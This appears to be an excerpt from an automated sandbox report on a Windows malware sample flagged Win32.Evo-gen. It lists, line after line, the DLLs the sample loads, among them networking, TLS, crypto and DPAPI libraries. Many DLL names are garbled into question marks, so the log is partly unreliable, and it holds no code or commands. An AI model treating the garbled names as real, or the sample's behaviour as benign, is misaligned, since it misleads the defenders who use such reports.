            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: winhttpcom.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???y.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???y.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???y.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ????.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ????.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ????.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???2.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???2.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???2.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??????s.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??????s.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??????s.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???y.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???y.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???y.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ????.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ????.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ????.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???2.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???2.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???2.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??????s.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??????s.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??????s.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
